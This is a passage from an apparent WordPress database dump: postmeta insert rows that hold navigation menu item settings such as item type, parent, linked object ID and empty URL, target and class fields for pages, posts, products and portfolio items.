enu_item_object_id','281'),(8201,4402,'_menu_item_object','page'),(8202,4402,'_menu_item_target',''),(8203,4402,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8204,4402,'_menu_item_xfn',''),(8205,4402,'_menu_item_url',''),(8206,4403,'_menu_item_type','post_type'),(8207,4403,'_menu_item_menu_item_parent','4352'),(8208,4403,'_menu_item_object_id','230'),(8209,4403,'_menu_item_object','page'),(8210,4403,'_menu_item_target',''),(8211,4403,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8212,4403,'_menu_item_xfn',''),(8213,4403,'_menu_item_url',''),(8214,4404,'_menu_item_type','post_type'),(8215,4404,'_menu_item_menu_item_parent','4352'),(8216,4404,'_menu_item_object_id','192'),(8217,4404,'_menu_item_object','page'),(8218,4404,'_menu_item_target',''),(8219,4404,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8220,4404,'_menu_item_xfn',''),(8221,4404,'_menu_item_url',''),(8230,4406,'_menu_item_type','post_type'),(8231,4406,'_menu_item_menu_item_parent','4351'),(8232,4406,'_menu_item_object_id','585'),(8233,4406,'_menu_item_object','page'),(8234,4406,'_menu_item_target',''),(8235,4406,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8236,4406,'_menu_item_xfn',''),(8237,4406,'_menu_item_url',''),(8238,4407,'_menu_item_type','post_type'),(8239,4407,'_menu_item_menu_item_parent','4351'),(8240,4407,'_menu_item_object_id','347'),(8241,4407,'_menu_item_object','page'),(8242,4407,'_menu_item_target',''),(8243,4407,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8244,4407,'_menu_item_xfn',''),(8245,4407,'_menu_item_url',''),(8246,4408,'_menu_item_type','post_type'),(8247,4408,'_menu_item_menu_item_parent','4351'),(8248,4408,'_menu_item_object_id','650'),(8249,4408,'_menu_item_object','page'),(8250,4408,'_menu_item_target',''),(8251,4408,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8252,4408,'_menu_item_xfn',''),(8253,4408,'_menu_item_url',''),(8254,4409,'_menu_item_type','post_type'),(8255,4409,'_menu_item_menu_item_parent','4351'),(8256,4409,'_menu_item_object_id','778'),(8257,4409,'_menu_item_object','page'),(8258,4409,'_menu_item_target',''),(8259,4409,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8260,4409,'_menu_item_xfn',''),(8261,4409,'_menu_item_url',''),(8262,4410,'_menu_item_type','post_type'),(8263,4410,'_menu_item_menu_item_parent','4351'),(8264,4410,'_menu_item_object_id','550'),(8265,4410,'_menu_item_object','page'),(8266,4410,'_menu_item_target',''),(8267,4410,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8268,4410,'_menu_item_xfn',''),(8269,4410,'_menu_item_url',''),(8270,4411,'_menu_item_type','post_type'),(8271,4411,'_menu_item_menu_item_parent','4354'),(8272,4411,'_menu_item_object_id','664'),(8273,4411,'_menu_item_object','page'),(8274,4411,'_menu_item_target',''),(8275,4411,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8276,4411,'_menu_item_xfn',''),(8277,4411,'_menu_item_url',''),(8278,4412,'_menu_item_type','post_type'),(8279,4412,'_menu_item_menu_item_parent','4367'),(8280,4412,'_menu_item_object_id','668'),(8281,4412,'_menu_item_object','post'),(8282,4412,'_menu_item_target',''),(8283,4412,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8284,4412,'_menu_item_xfn',''),(8285,4412,'_menu_item_url',''),(8286,4413,'_menu_item_type','post_type'),(8287,4413,'_menu_item_menu_item_parent','4367'),(8288,4413,'_menu_item_object_id','753'),(8289,4413,'_menu_item_object','post'),(8290,4413,'_menu_item_target',''),(8291,4413,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8292,4413,'_menu_item_xfn',''),(8293,4413,'_menu_item_url',''),(8294,4414,'_menu_item_type','post_type'),(8295,4414,'_menu_item_menu_item_parent','4367'),(8296,4414,'_menu_item_object_id','733'),(8297,4414,'_menu_item_object','post'),(8298,4414,'_menu_item_target',''),(8299,4414,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8300,4414,'_menu_item_xfn',''),(8301,4414,'_menu_item_url',''),(8302,4415,'_menu_item_type','post_type'),(8303,4415,'_menu_item_menu_item_parent','4367'),(8304,4415,'_menu_item_object_id','781'),(8305,4415,'_menu_item_object','post'),(8306,4415,'_menu_item_target',''),(8307,4415,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8308,4415,'_menu_item_xfn',''),(8309,4415,'_menu_item_url',''),(8310,4416,'_menu_item_type','post_type'),(8311,4416,'_menu_item_menu_item_parent','4367'),(8312,4416,'_menu_item_object_id','825'),(8313,4416,'_menu_item_object','post'),(8314,4416,'_menu_item_target',''),(8315,4416,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8316,4416,'_menu_item_xfn',''),(8317,4416,'_menu_item_url',''),(8318,4417,'_menu_item_type','post_type'),(8319,4417,'_menu_item_menu_item_parent','4367'),(8320,4417,'_menu_item_object_id','844'),(8321,4417,'_menu_item_object','post'),(8322,4417,'_menu_item_target',''),(8323,4417,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8324,4417,'_menu_item_xfn',''),(8325,4417,'_menu_item_url',''),(8326,4418,'_menu_item_type','post_type'),(8327,4418,'_menu_item_menu_item_parent','4354'),(8328,4418,'_menu_item_object_id','850'),(8329,4418,'_menu_item_object','page'),(8330,4418,'_menu_item_target',''),(8331,4418,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8332,4418,'_menu_item_xfn',''),(8333,4418,'_menu_item_url',''),(8334,4419,'_menu_item_type','post_type'),(8335,4419,'_menu_item_menu_item_parent','4354'),(8336,4419,'_menu_item_object_id','853'),(8337,4419,'_menu_item_object','page'),(8338,4419,'_menu_item_target',''),(8339,4419,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8340,4419,'_menu_item_xfn',''),(8341,4419,'_menu_item_url',''),(8342,4420,'_menu_item_type','post_type'),(8343,4420,'_menu_item_menu_item_parent','4351'),(8344,4420,'_menu_item_object_id','869'),(8345,4420,'_menu_item_object','page'),(8346,4420,'_menu_item_target',''),(8347,4420,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8348,4420,'_menu_item_xfn',''),(8349,4420,'_menu_item_url',''),(8350,4421,'_menu_item_type','post_type'),(8351,4421,'_menu_item_menu_item_parent','4351'),(8352,4421,'_menu_item_object_id','872'),(8353,4421,'_menu_item_object','page'),(8354,4421,'_menu_item_target',''),(8355,4421,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8356,4421,'_menu_item_xfn',''),(8357,4421,'_menu_item_url',''),(8454,4434,'_menu_item_type','post_type'),(8455,4434,'_menu_item_menu_item_parent','4363'),(8456,4434,'_menu_item_object_id','650'),(8457,4434,'_menu_item_object','page'),(8458,4434,'_menu_item_target',''),(8459,4434,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8460,4434,'_menu_item_xfn',''),(8461,4434,'_menu_item_url',''),(8462,4435,'_menu_item_type','post_type'),(8463,4435,'_menu_item_menu_item_parent','4363'),(8464,4435,'_menu_item_object_id','347'),(8465,4435,'_menu_item_object','page'),(8466,4435,'_menu_item_target',''),(8467,4435,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8468,4435,'_menu_item_xfn',''),(8469,4435,'_menu_item_url',''),(8470,4436,'_menu_item_type','post_type'),(8471,4436,'_menu_item_menu_item_parent','4364'),(8472,4436,'_menu_item_object_id','406'),(8473,4436,'_menu_item_object','page'),(8474,4436,'_menu_item_target',''),(8475,4436,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8476,4436,'_menu_item_xfn',''),(8477,4436,'_menu_item_url',''),(8486,4438,'_menu_item_type','post_type'),(8487,4438,'_menu_item_menu_item_parent','4363'),(8488,4438,'_menu_item_object_id','10'),(8489,4438,'_menu_item_object','page'),(8490,4438,'_menu_item_target',''),(8491,4438,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8492,4438,'_menu_item_xfn',''),(8493,4438,'_menu_item_url',''),(8494,4439,'_menu_item_type','post_type'),(8495,4439,'_menu_item_menu_item_parent','4355'),(8496,4439,'_menu_item_object_id','6'),(8497,4439,'_menu_item_object','page'),(8498,4439,'_menu_item_target',''),(8499,4439,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8500,4439,'_menu_item_xfn',''),(8501,4439,'_menu_item_url',''),(8502,4440,'_menu_item_type','post_type'),(8503,4440,'_menu_item_menu_item_parent','4369'),(8504,4440,'_menu_item_object_id','4396'),(8505,4440,'_menu_item_object','page'),(8506,4440,'_menu_item_target',''),(8507,4440,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8508,4440,'_menu_item_xfn',''),(8509,4440,'_menu_item_url',''),(8510,4441,'_menu_item_type','post_type'),(8511,4441,'_menu_item_menu_item_parent','4369'),(8512,4441,'_menu_item_object_id','4397'),(8513,4441,'_menu_item_object','page'),(8514,4441,'_menu_item_target',''),(8515,4441,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8516,4441,'_menu_item_xfn',''),(8517,4441,'_menu_item_url',''),(8518,4442,'_menu_item_type','post_type'),(8519,4442,'_menu_item_menu_item_parent','4369'),(8520,4442,'_menu_item_object_id','9'),(8521,4442,'_menu_item_object','page'),(8522,4442,'_menu_item_target',''),(8523,4442,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8524,4442,'_menu_item_xfn',''),(8525,4442,'_menu_item_url',''),(8526,4443,'_menu_item_type','post_type'),(8527,4443,'_menu_item_menu_item_parent','4368'),(8528,4443,'_menu_item_object_id','1067'),(8529,4443,'_menu_item_object','page'),(8530,4443,'_menu_item_target',''),(8531,4443,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8532,4443,'_menu_item_xfn',''),(8533,4443,'_menu_item_url',''),(8534,4444,'_menu_item_type','post_type'),(8535,4444,'_menu_item_menu_item_parent','4368'),(8536,4444,'_menu_item_object_id','1064'),(8537,4444,'_menu_item_object','page'),(8538,4444,'_menu_item_target',''),(8539,4444,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8540,4444,'_menu_item_xfn',''),(8541,4444,'_menu_item_url',''),(8542,4445,'_menu_item_type','post_type'),(8543,4445,'_menu_item_menu_item_parent','4368'),(8544,4445,'_menu_item_object_id','1062'),(8545,4445,'_menu_item_object','page'),(8546,4445,'_menu_item_target',''),(8547,4445,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8548,4445,'_menu_item_xfn',''),(8549,4445,'_menu_item_url',''),(8550,4446,'_menu_item_type','post_type'),(8551,4446,'_menu_item_menu_item_parent','4368'),(8552,4446,'_menu_item_object_id','1060'),(8553,4446,'_menu_item_object','page'),(8554,4446,'_menu_item_target',''),(8555,4446,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8556,4446,'_menu_item_xfn',''),(8557,4446,'_menu_item_url',''),(8558,4447,'_menu_item_type','post_type'),(8559,4447,'_menu_item_menu_item_parent','4368'),(8560,4447,'_menu_item_object_id','1058'),(8561,4447,'_menu_item_object','page'),(8562,4447,'_menu_item_target',''),(8563,4447,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8564,4447,'_menu_item_xfn',''),(8565,4447,'_menu_item_url',''),(8566,4448,'_menu_item_type','post_type'),(8567,4448,'_menu_item_menu_item_parent','4372'),(8568,4448,'_menu_item_object_id','1474'),(8569,4448,'_menu_item_object','portfolio-item'),(8570,4448,'_menu_item_target',''),(8571,4448,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8572,4448,'_menu_item_xfn',''),(8573,4448,'_menu_item_url',''),(8574,4449,'_menu_item_type','post_type'),(8575,4449,'_menu_item_menu_item_parent','4372'),(8576,4449,'_menu_item_object_id','1463'),(8577,4449,'_menu_item_object','portfolio-item'),(8578,4449,'_menu_item_target',''),(8579,4449,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8580,4449,'_menu_item_xfn',''),(8581,4449,'_menu_item_url',''),(8582,4450,'_menu_item_type','post_type'),(8583,4450,'_menu_item_menu_item_parent','4372'),(8584,4450,'_menu_item_object_id','1459'),(8585,4450,'_menu_item_object','portfolio-item'),(8586,4450,'_menu_item_target',''),(8587,4450,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8588,4450,'_menu_item_xfn',''),(8589,4450,'_menu_item_url',''),(8590,4451,'_menu_item_type','post_type'),(8591,4451,'_menu_item_menu_item_parent','4372'),(8592,4451,'_menu_item_object_id','1444'),(8593,4451,'_menu_item_object','portfolio-item'),(8594,4451,'_menu_item_target',''),(8595,4451,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8596,4451,'_menu_item_xfn',''),(8597,4451,'_menu_item_url',''),(8598,4452,'_menu_item_type','post_type'),(8599,4452,'_menu_item_menu_item_parent','4372'),(8600,4452,'_menu_item_object_id','1442'),(8601,4452,'_menu_item_object','portfolio-item'),(8602,4452,'_menu_item_target',''),(8603,4452,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8604,4452,'_menu_item_xfn',''),(8605,4452,'_menu_item_url',''),(8606,4453,'_menu_item_type','post_type'),(8607,4453,'_menu_item_menu_item_parent','4372'),(8608,4453,'_menu_item_object_id','1440'),(8609,4453,'_menu_item_object','portfolio-item'),(8610,4453,'_menu_item_target',''),(8611,4453,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8612,4453,'_menu_item_xfn',''),(8613,4453,'_menu_item_url',''),(8614,4454,'_menu_item_type','post_type'),(8615,4454,'_menu_item_menu_item_parent','4372'),(8616,4454,'_menu_item_object_id','1438'),(8617,4454,'_menu_item_object','portfolio-item'),(8618,4454,'_menu_item_target',''),(8619,4454,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8620,4454,'_menu_item_xfn',''),(8621,4454,'_menu_item_url',''),(8622,4455,'_menu_item_type','post_type'),(8623,4455,'_menu_item_menu_item_parent','4372'),(8624,4455,'_menu_item_object_id','1437'),(8625,4455,'_menu_item_object','portfolio-item'),(8626,4455,'_menu_item_target',''),(8627,4455,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8628,4455,'_menu_item_xfn',''),(8629,4455,'_menu_item_url',''),(8630,4456,'_menu_item_type','post_type'),(8631,4456,'_menu_item_menu_item_parent','4372'),(8632,4456,'_menu_item_object_id','1433'),(8633,4456,'_menu_item_object','portfolio-item'),(8634,4456,'_menu_item_target',''),(8635,4456,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8636,4456,'_menu_item_xfn',''),(8637,4456,'_menu_item_url',''),(8638,4457,'_menu_item_type','post_type'),(8639,4457,'_menu_item_menu_item_parent','4351'),(8640,4457,'_menu_item_object_id','1504'),(8641,4457,'_menu_item_object','page'),(8642,4457,'_menu_item_target',''),(8643,4457,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8644,4457,'_menu_item_xfn',''),(8645,4457,'_menu_item_url',''),(8646,4458,'_menu_item_type','post_type'),(8647,4458,'_menu_item_menu_item_parent','4370'),(8648,4458,'_menu_item_object_id','1684'),(8649,4458,'_menu_item_object','page'),(8650,4458,'_menu_item_target',''),(8651,4458,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8652,4458,'_menu_item_xfn',''),(8653,4458,'_menu_item_url',''),(8654,4459,'_menu_item_type','post_type'),(8655,4459,'_menu_item_menu_item_parent','4370'),(8656,4459,'_menu_item_object_id','1702'),(8657,4459,'_menu_item_object','page'),(8658,4459,'_menu_item_target',''),(8659,4459,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8660,4459,'_menu_item_xfn',''),(8661,4459,'_menu_item_url',''),(8662,4460,'_menu_item_type','post_type'),(8663,4460,'_menu_item_menu_item_parent','4370'),(8664,4460,'_menu_item_object_id','1700'),(8665,4460,'_menu_item_object','page'),(8666,4460,'_menu_item_target',''),(8667,4460,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8668,4460,'_menu_item_xfn',''),(8669,4460,'_menu_item_url',''),(8670,4461,'_menu_item_type','post_type'),(8671,4461,'_menu_item_menu_item_parent','4370'),(8672,4461,'_menu_item_object_id','1698'),(8673,4461,'_menu_item_object','page'),(8674,4461,'_menu_item_target',''),(8675,4461,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8676,4461,'_menu_item_xfn',''),(8677,4461,'_menu_item_url',''),(8678,4462,'_menu_item_type','post_type'),(8679,4462,'_menu_item_menu_item_parent','4370'),(8680,4462,'_menu_item_object_id','1693'),(8681,4462,'_menu_item_object','page'),(8682,4462,'_menu_item_target',''),(8683,4462,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8684,4462,'_menu_item_xfn',''),(8685,4462,'_menu_item_url',''),(8686,4463,'_menu_item_type','post_type'),(8687,4463,'_menu_item_menu_item_parent','4371'),(8688,4463,'_menu_item_object_id','1752'),(8689,4463,'_menu_item_object','page'),(8690,4463,'_menu_item_target',''),(8691,4463,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8692,4463,'_menu_item_xfn',''),(8693,4463,'_menu_item_url',''),(8694,4464,'_menu_item_type','post_type'),(8695,4464,'_menu_item_menu_item_parent','4371'),(8696,4464,'_menu_item_object_id','1749'),(8697,4464,'_menu_item_object','page'),(8698,4464,'_menu_item_target',''),(8699,4464,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8700,4464,'_menu_item_xfn',''),(8701,4464,'_menu_item_url',''),(8702,4465,'_menu_item_type','post_type'),(8703,4465,'_menu_item_menu_item_parent','4371'),(8704,4465,'_menu_item_object_id','1745'),(8705,4465,'_menu_item_object','page'),(8706,4465,'_menu_item_target',''),(8707,4465,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8708,4465,'_menu_item_xfn',''),(8709,4465,'_menu_item_url',''),(8710,4466,'_menu_item_type','post_type'),(8711,4466,'_menu_item_menu_item_parent','4371'),(8712,4466,'_menu_item_object_id','1735'),(8713,4466,'_menu_item_object','page'),(8714,4466,'_menu_item_target',''),(8715,4466,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8716,4466,'_menu_item_xfn',''),(8717,4466,'_menu_item_url',''),(8718,4467,'_menu_item_type','post_type'),(8719,4467,'_menu_item_menu_item_parent','4371'),(8720,4467,'_menu_item_object_id','1730'),(8721,4467,'_menu_item_object','page'),(8722,4467,'_menu_item_target',''),(8723,4467,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8724,4467,'_menu_item_xfn',''),(8725,4467,'_menu_item_url',''),(8726,4468,'_menu_item_type','post_type'),(8727,4468,'_menu_item_menu_item_parent','4371'),(8728,4468,'_menu_item_object_id','1728'),(8729,4468,'_menu_item_object','page'),(8730,4468,'_menu_item_target',''),(8731,4468,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8732,4468,'_menu_item_xfn',''),(8733,4468,'_menu_item_url',''),(8734,4469,'_menu_item_type','post_type'),(8735,4469,'_menu_item_menu_item_parent','4371'),(8736,4469,'_menu_item_object_id','1724'),(8737,4469,'_menu_item_object','page'),(8738,4469,'_menu_item_target',''),(8739,4469,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8740,4469,'_menu_item_xfn',''),(8741,4469,'_menu_item_url',''),(8742,4470,'_menu_item_type','post_type'),(8743,4470,'_menu_item_menu_item_parent','4355'),(8744,4470,'_menu_item_object_id','1080'),(8745,4470,'_menu_item_object','product'),(8746,4470,'_menu_item_target',''),(8747,4470,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8748,4470,'_menu_item_xfn',''),(8749,4470,'_menu_item_url',''),(8958,4497,'_menu_item_type','post_type'),(8959,4497,'_menu_item_menu_item_parent','4365'),(8960,4497,'_menu_item_object_id','850'),(8961,4497,'_menu_item_object','page'),(8962,4497,'_menu_item_target',''),(8963,4497,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8964,4497,'_menu_item_xfn',''),(8965,4497,'_menu_item_url',''),(8966,4498,'_menu_item_type','post_type'),(8967,4498,'_menu_item_menu_item_parent','4365'),(8968,4498,'_menu_item_object_id','664'),(8969,4498,'_menu_item_object','page'),(8970,4498,'_menu_item_target',''),(8971,4498,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8972,4498,'_menu_item_xfn',''),(8973,4498,'_menu_item_url',''),(8974,4499,'_menu_item_type','post_type'),(8975,4499,'_menu_item_menu_item_parent','4365'),(8976,4499,'_menu_item_object_id','668'),(8977,4499,'_menu_item_object','post'),(8978,4499,'_menu_item_target',''),(8979,4499,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8980,4499,'_menu_item_xfn',''),(8981,4499,'_menu_item_url',''),(8982,4500,'_menu_item_type','post_type'),(8983,4500,'_menu_item_menu_item_parent','4366'),(8984,4500,'_menu_item_object_id','1080'),(8985,4500,'_menu_item_object','product'),(8986,4500,'_menu_item_target',''),(8987,4500,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8988,4500,'_menu_item_xfn',''),(8989,4500,'_menu_item_url',''),(8990,4501,'_menu_item_type','post_type'),(8991,4501,'_menu_item_menu_item_parent','4366'),(8992,4501,'_menu_item_object_id','6'),(8993,4501,'_menu_item_object','page'),(8994,4501,'_menu_item_target',''),(8995,4501,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(8996,4501,'_menu_item_xfn',''),(8997,4501,'_menu_item_url',''),(8998,4502,'_menu_item_type','post_type'),(8999,4502,'_menu_item_menu_item_parent','4366'),(9000,4502,'_menu_item_object_id','1058'),(9001,4502,'_menu_item_object','page'),(9002,4502,'_menu_item_target',''),(9003,4502,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9004,4502,'_menu_item_xfn',''),(9005,4502,'_menu_item_url',''),(9006,4503,'_menu_item_type','post_type'),(9007,4503,'_menu_item_menu_item_parent','4376'),(9008,4503,'_menu_item_object_id','1504'),(9009,4503,'_menu_item_object','page'),(9010,4503,'_menu_item_target',''),(9011,4503,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9012,4503,'_menu_item_xfn',''),(9013,4503,'_menu_item_url',''),(9014,4504,'_menu_item_type','post_type'),(9015,4504,'_menu_item_menu_item_parent','4376'),(9016,4504,'_menu_item_object_id','10'),(9017,4504,'_menu_item_object','page'),(9018,4504,'_menu_item_target',''),(9019,4504,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9020,4504,'_menu_item_xfn',''),(9021,4504,'_menu_item_url',''),(9022,4505,'_menu_item_type','post_type'),(9023,4505,'_menu_item_menu_item_parent','4376'),(9024,4505,'_menu_item_object_id','347'),(9025,4505,'_menu_item_object','page'),(9026,4505,'_menu_item_target',''),(9027,4505,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9028,4505,'_menu_item_xfn',''),(9029,4505,'_menu_item_url',''),(9038,4507,'_menu_item_type','post_type'),(9039,4507,'_menu_item_menu_item_parent','4377'),(9040,4507,'_menu_item_object_id','230'),(9041,4507,'_menu_item_object','page'),(9042,4507,'_menu_item_target',''),(9043,4507,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9044,4507,'_menu_item_xfn',''),(9045,4507,'_menu_item_url',''),(9046,4508,'_menu_item_type','post_type'),(9047,4508,'_menu_item_menu_item_parent','4377'),(9048,4508,'_menu_item_object_id','406'),(9049,4508,'_menu_item_object','page'),(9050,4508,'_menu_item_target',''),(9051,4508,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9052,4508,'_menu_item_xfn',''),(9053,4508,'_menu_item_url',''),(9062,4510,'_menu_item_type','post_type'),(9063,4510,'_menu_item_menu_item_parent','4352'),(9064,4510,'_menu_item_object_id','2037'),(9065,4510,'_menu_item_object','page'),(9066,4510,'_menu_item_target',''),(9067,4510,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9068,4510,'_menu_item_xfn',''),(9069,4510,'_menu_item_url',''),(9070,4511,'_menu_item_type','post_type'),(9071,4511,'_menu_item_menu_item_parent','4381'),(9072,4511,'_menu_item_object_id','1338'),(9073,4511,'_menu_item_object','page'),(9074,4511,'_menu_item_target',''),(9075,4511,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9076,4511,'_menu_item_xfn',''),(9077,4511,'_menu_item_url',''),(9078,4512,'_menu_item_type','post_type'),(9079,4512,'_menu_item_menu_item_parent','4381'),(9080,4512,'_menu_item_object_id','2105'),(9081,4512,'_menu_item_object','page'),(9082,4512,'_menu_item_target',''),(9083,4512,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9084,4512,'_menu_item_xfn',''),(9085,4512,'_menu_item_url',''),(9086,4513,'_menu_item_type','post_type'),(9087,4513,'_menu_item_menu_item_parent','4381'),(9088,4513,'_menu_item_object_id','2098'),(9089,4513,'_menu_item_object','page'),(9090,4513,'_menu_item_target',''),(9091,4513,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9092,4513,'_menu_item_xfn',''),(9093,4513,'_menu_item_url',''),(9094,4514,'_menu_item_type','post_type'),(9095,4514,'_menu_item_menu_item_parent','4384'),(9096,4514,'_menu_item_object_id','2180'),(9097,4514,'_menu_item_object','page'),(9098,4514,'_menu_item_target',''),(9099,4514,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9100,4514,'_menu_item_xfn',''),(9101,4514,'_menu_item_url',''),(9110,4516,'_menu_item_type','post_type'),(9111,4516,'_menu_item_menu_item_parent','4384'),(9112,4516,'_menu_item_object_id','2207'),(9113,4516,'_menu_item_object','page'),(9114,4516,'_menu_item_target',''),(9115,4516,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9116,4516,'_menu_item_xfn',''),(9117,4516,'_menu_item_url',''),(9118,4517,'_menu_item_type','post_type'),(9119,4517,'_menu_item_menu_item_parent','4383'),(9120,4517,'_menu_item_object_id','2566'),(9121,4517,'_menu_item_object','page'),(9122,4517,'_menu_item_target',''),(9123,4517,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9124,4517,'_menu_item_xfn',''),(9125,4517,'_menu_item_url',''),(9126,4518,'_menu_item_type','post_type'),(9127,4518,'_menu_item_menu_item_parent','4382'),(9128,4518,'_menu_item_object_id','2217'),(9129,4518,'_menu_item_object','page'),(9130,4518,'_menu_item_target',''),(9131,4518,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9132,4518,'_menu_item_xfn',''),(9133,4518,'_menu_item_url',''),(9134,4519,'_menu_item_type','post_type'),(9135,4519,'_menu_item_menu_item_parent','4383'),(9136,4519,'_menu_item_object_id','2577'),(9137,4519,'_menu_item_object','page'),(9138,4519,'_menu_item_target',''),(9139,4519,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9140,4519,'_menu_item_xfn',''),(9141,4519,'_menu_item_url',''),(9142,4520,'_menu_item_type','post_type'),(9143,4520,'_menu_item_menu_item_parent','4384'),(9144,4520,'_menu_item_object_id','2593'),(9145,4520,'_menu_item_object','page'),(9146,4520,'_menu_item_target',''),(9147,4520,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9148,4520,'_menu_item_xfn',''),(9149,4520,'_menu_item_url',''),(9150,4521,'_menu_item_type','post_type'),(9151,4521,'_menu_item_menu_item_parent','4384'),(9152,4521,'_menu_item_object_id','2611'),(9153,4521,'_menu_item_object','page'),(9154,4521,'_menu_item_target',''),(9155,4521,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9156,4521,'_menu_item_xfn',''),(9157,4521,'_menu_item_url',''),(9158,4522,'_menu_item_type','post_type'),(9159,4522,'_menu_item_menu_item_parent','4383'),(9160,4522,'_menu_item_object_id','2620'),(9161,4522,'_menu_item_object','page'),(9162,4522,'_menu_item_target',''),(9163,4522,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9164,4522,'_menu_item_xfn',''),(9165,4522,'_menu_item_url',''),(9166,4523,'_menu_item_type','post_type'),(9167,4523,'_menu_item_menu_item_parent','4384'),(9168,4523,'_menu_item_object_id','2630'),(9169,4523,'_menu_item_object','page'),(9170,4523,'_menu_item_target',''),(9171,4523,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9172,4523,'_menu_item_xfn',''),(9173,4523,'_menu_item_url',''),(9174,4524,'_menu_item_type','post_type'),(9175,4524,'_menu_item_menu_item_parent','4381'),(9176,4524,'_menu_item_object_id','2635'),(9177,4524,'_menu_item_object','page'),(9178,4524,'_menu_item_target',''),(9179,4524,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9180,4524,'_menu_item_xfn',''),(9181,4524,'_menu_item_url',''),(9182,4525,'_menu_item_type','post_type'),(9183,4525,'_menu_item_menu_item_parent','4383'),(9184,4525,'_menu_item_object_id','2644'),(9185,4525,'_menu_item_object','page'),(9186,4525,'_menu_item_target',''),(9187,4525,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9188,4525,'_menu_item_xfn',''),(9189,4525,'_menu_item_url',''),(9190,4526,'_menu_item_type','post_type'),(9191,4526,'_menu_item_menu_item_parent','4382'),(9192,4526,'_menu_item_object_id','2651'),(9193,4526,'_menu_item_object','page'),(9194,4526,'_menu_item_target',''),(9195,4526,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9196,4526,'_menu_item_xfn',''),(9197,4526,'_menu_item_url',''),(9198,4527,'_menu_item_type','post_type'),(9199,4527,'_menu_item_menu_item_parent','4383'),(9200,4527,'_menu_item_object_id','2659'),(9201,4527,'_menu_item_object','page'),(9202,4527,'_menu_item_target',''),(9203,4527,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(9204,4527,'_menu_item_xfn',''),(9205,4527,'_menu_item_url',''),(9206,4528,'_menu_item_type','post_type'),